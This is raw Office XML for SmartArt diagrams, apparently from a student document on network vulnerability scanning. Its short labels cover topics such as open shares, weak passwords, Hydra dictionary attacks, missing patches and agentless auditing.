          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="245299" y="947351"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8D2B3185-F384-4D3D-A45A-4EABB10A17D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="384496" y="1976938"/>
          <a:ext cx="2462319" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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DF48C-62BC-4479-890C-9D4C209EAAD8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="223642" y="1849958"/>
          <a:ext cx="1554637" cy="739411"/>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Open share drives </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="245299" y="1871615"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{72C9877A-FDD9-4192-8817-50ACCF573590}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="2018047" y="1514805"/>
          <a:ext cx="1156531" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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C5ABA-D66A-4A38-8A57-C8B7B978EE6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2184956" y="1849958"/>
          <a:ext cx="1554637" cy="739411"/>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FTP portals (Weak protection of data in transit)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2206613" y="1871615"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B6B1FCD9-8491-4CAE-BB83-AC6D7619275D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="2018047" y="590541"/>
          <a:ext cx="1156531" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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993C7-17ED-48EE-94CE-61EA2E177E4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2184956" y="925694"/>
          <a:ext cx="1554637" cy="73941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Vulnerable applications, including operating systems</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2206613" y="947351"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{06B807D4-A5A1-4608-B141-788390518BF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2345810" y="128409"/>
          <a:ext cx="2462319" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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207F68-DE03-4048-AABE-56DCACE31951}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2184956" y="1429"/>
          <a:ext cx="1554637" cy="739411"/>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Each piece of LAN/WAN equipment</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2206613" y="23086"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF9E695A-BCB4-4FFE-94E0-4FACD8AA92D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3979361" y="590541"/>
          <a:ext cx="1156531" cy="110911"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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EB9D0-0CF9-4EEE-BB4E-1F834AF4539F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4146270" y="1429"/>
          <a:ext cx="1554637" cy="739411"/>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Find the network topology</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4167927" y="23086"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99F180B1-9437-4069-81E1-8757BD1AECD9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3979361" y="1514805"/>
          <a:ext cx="1156531" cy="110911"/>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7ACD-EF1D-4727-829C-8CA8B8CDACA8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4146270" y="925694"/>
          <a:ext cx="1554637" cy="739411"/>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 addresses of live hosts, firewalls, routers, etc</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4167927" y="947351"/>
        <a:ext cx="1511323" cy="696097"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1D3AB934-F3C8-492E-9ED5-B3B5B4279D38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4146270" y="1849958"/>
          <a:ext cx="1554637" cy="7394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List of potential vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4167927" y="1871615"/>
        <a:ext cx="1511323" cy="696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CAE9F-D5B9-45A3-A607-CA3084F4DE85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5122160" y="1300341"/>
          <a:ext cx="91440" cy="648989"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="648989"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="100540" y="648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5365E-01D6-452D-91EB-826701F4DA26}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2949847" y="637434"/>
          <a:ext cx="2576907" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2576907" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2576907"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CE232-DDD8-495A-9282-4592F483A5EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2949847" y="637434"/>
          <a:ext cx="1498289" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1498289" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="149828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9B59C-17E1-4A1B-A486-77DC2F601B95}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3090402" y="1300341"/>
          <a:ext cx="134578" cy="451040"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="451040"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="134578" y="4510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CF992-8783-49B3-8799-F8E50F7F51DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2949847" y="637434"/>
          <a:ext cx="499429" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="499429" y="50835"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="49942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39C77-EA13-4B41-A68D-679001EE7284}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2091542" y="1300341"/>
          <a:ext cx="134578" cy="1336615"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="1336615"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="134578" y="13366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F4E22-8D16-4470-9DA9-3CD34C96E127}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2091542" y="1300341"/>
          <a:ext cx="134578" cy="462785"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="462785"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="134578" y="462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D9177-882B-4C3F-A8E8-B402807CF819}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2450418" y="637434"/>
          <a:ext cx="499429" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="499429" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="49942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620BF-88AC-4394-AA96-20C2E7DD350B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092682" y="1300341"/>
          <a:ext cx="134578" cy="382289"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="382289"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="134578" y="3822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82573-B943-4235-8D45-F53E9DC3C5B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1451558" y="637434"/>
          <a:ext cx="1498289" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1498289" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="149828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0CC44-4619-4CB8-A7EB-AAB3F7EB9F9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="93822" y="1300341"/>
          <a:ext cx="134578" cy="514541"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="514541"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="134578" y="5145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710ED-0EF4-4ED8-9BA1-AAFB770247F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="452698" y="637434"/>
          <a:ext cx="2497149" cy="101671"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2497149" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="249714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730E9-A71D-4D88-8EA2-A9079B9FD6A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2185707" y="76198"/>
          <a:ext cx="1528280" cy="5612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scan vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2185707" y="76198"/>
        <a:ext cx="1528280" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C4B1BA5-B0C2-40ED-8784-3F5BE55B269F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4104"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That allow a remote hacker to control</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4104" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ED14D9CD-F56D-4F66-AFBF-E429993841D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="228401" y="1402012"/>
          <a:ext cx="748545" cy="8257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r </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>access sensitive data on a system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="228401" y="1402012"/>
        <a:ext cx="748545" cy="825740"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{624B26AF-0B59-4C15-81EE-2EDC0A9FB0C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="100296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Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1002963" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FDB45321-8F4C-4BF7-9458-5CB5813B41FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1227261" y="1402012"/>
          <a:ext cx="748545" cy="5612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missing patches, etc.).</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1227261" y="1402012"/>
        <a:ext cx="748545" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{94C8B4E3-D99B-4DD9-B33E-B9259155C536}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="200182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fault passwords, </a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2001823" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8DEE304A-656C-4E89-9A0F-DD3E4770BFE3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2226120" y="1402012"/>
          <a:ext cx="748545" cy="72222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Common passwords,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> and blank/absent passwords</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2226120" y="1402012"/>
        <a:ext cx="748545" cy="722229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBA5A882-83E3-4A0E-B541-3574A8A43AD3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2226120" y="2225913"/>
          <a:ext cx="1228646" cy="822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can also call Hydra (an external tool) to launch a dictionary attack.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2226120" y="2225913"/>
        <a:ext cx="1228646" cy="822087"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9059B5D-0051-4A03-9F87-2A3D3AECDFC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="300068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nials of service</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3000683" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{66E66165-69B3-4F28-835B-B37555E74D88}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3224980" y="1402012"/>
          <a:ext cx="1272398" cy="69873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gainst the TCP/IP stack by using malformed packets</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3224980" y="1402012"/>
        <a:ext cx="1272398" cy="698739"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0999B1AA-9C30-4622-9BBE-93E17DD27E58}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="399954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Finding malware</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3999543" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8EF93997-17A3-4DB1-81ED-A597790B8F82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5078161"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Agentless </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>auditing</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5078161" y="739105"/>
        <a:ext cx="897188" cy="561236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{27DD35C6-FF90-4088-808F-76E93B75ADB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5222700" y="1402012"/>
          <a:ext cx="748545" cy="10946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To make sure no host on your network is missing security patches</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5222700" y="1402012"/>
        <a:ext cx="748545" cy="1094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7B510-248F-49FE-AA11-57CEC34B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1</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Piyush Gambhir</cp:lastModifiedBy>
  <cp:revision>147</cp:revision>
  <cp:lastPrinted>2021-04-04T17:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-16T07:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-02T15:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>